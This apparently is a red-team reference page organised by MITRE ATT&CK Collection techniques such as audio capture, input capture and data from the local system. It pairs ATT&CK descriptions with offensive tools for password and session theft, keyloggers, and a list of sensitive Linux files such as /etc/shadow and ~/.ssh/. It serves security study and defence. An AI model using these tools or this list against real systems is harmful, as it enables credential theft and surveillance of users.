Collection

  • MITRE ATT&CK - Collection
    • Collection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.

Audio Capture

  • Audio Capture - ATT&CK
    • An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
    • Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

Windows


Automated Collection

  • Automated Collection - ATT&CK
    • Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files.

Linux

  • LaZagne
    • The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

Mac

  • Lazagne
    • The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

Windows

  • LaZagne
    • The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.
  • BrowserGatherer
    • Fileless Extraction of Sensitive Browser Information with PowerShell
  • SessionGopher
    • SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.
  • KeeFarce
    • Extracts passwords from a KeePass 2.x database, directly from memory.
  • KeeThief
    • Methods for attacking KeePass 2.X databases, including extracting of encryption key material from memory.

Browser Extensions

  • Browser Extensions - ATT&CK
    • Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.12

Clipboard Data

  • Clipboard Data - ATT&CK
    • Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.

Windows

Linux

Mac


Data Staged

  • Data Staged - ATT&CK
    • Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

Data from Local System

  • Data from Local System - ATT&CK
    • Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration. Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a Command-Line Interface, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

Windows

  • SearchForCC
    • A collection of open source/common tools/scripts to perform a system memory dump and/or process memory dump on Windows-based PoS systems and search for unencrypted credit card track data.

Linux

  • List:
    • /etc/passwd : Contains local Linux users.
    • /etc/shadow : Contains local account password hashes.
    • /etc/group : Contains local account groups.
    • /etc/init.d/ : Contains service init script - worth a look to see whats installed.
    • /etc/hostname : System hostname.
    • /etc/network/interfaces : Network interfaces.
    • /etc/resolv.conf : System DNS servers.
    • /etc/profile : System environment variables.
    • ~/.ssh/ : SSH keys.
    • ~/.bash_history : Users bash history log.
    • /var/log/ : Linux system log files are typically stored here.
    • /var/adm/ : UNIX system log files are typically stored here.
    • /var/log/apache2/access.log & /var/log/httpd/access.log : Apache access log file typical path.
    • /etc/fstab : File system mounts.

Data from Network Shared Drive

  • Data from Network Shared Drive - ATT&CK
    • Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Windows


Data from Removable Media

  • Data from Removable Media - ATT&CK
    • Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Adversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. Some adversaries may also use Automated Collection on removable media.

Linux

OS X

Windows


Email Collection

  • Email Collection - ATT&CK
    • Adversaries may target user email to collect sensitive information from a target.
    • Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
    • Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
    • Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.

Windows


Input Capture

  • Input Capture - ATT&CK
    • Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
    • Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes,Adventures of a Keystroke but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider.Wrightson 2012
    • Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
    • Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through External Remote Services and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service.Volexity Virtual Private Keylogging

Linux

  • How to Monitor Keyboard Keystrokes Using ‘LogKeys’ in Linux
  • logkeys - a GNU/Linux keylogger
    • logkeys is a linux keylogger. It is no more advanced than other available linux keyloggers, notably lkl and uberkey, but is a bit newer, more up to date, it doesn't unreliably repeat keys and it shouldn't crash your X. All in all, it just seems to work. It relies on event interface of the Linux input subsystem. Once completely set, it logs all common character and function keys, while also being fully aware of Shift and AltGr key modifiers.
  • keysniffer: trace pressed keys in debugfs
  • SKeylogger
    • SKeylogger is a simple keylogger. I had previously been using a few other open source keyloggers, but they stopped working when I upgraded my operating system. I tried to look through the code of those keyloggers, but it was undocumented, messy, and complex. I decided to make my own highly documented and very simple keylogger.
  • Using xkeyscan to Parse an X-Based Linux Keylogger

Windows

Man in the Browser

  • Man in the Browser - ATT&CK
    • Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.1
    • A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet.23
    • Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication.4

Screen Capture

  • Screen Capture - ATT&CK
    • Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.

Linux

Mac

Windows


Video Capture

  • Video Capture - ATT&CK
    • An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files. Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.

Windows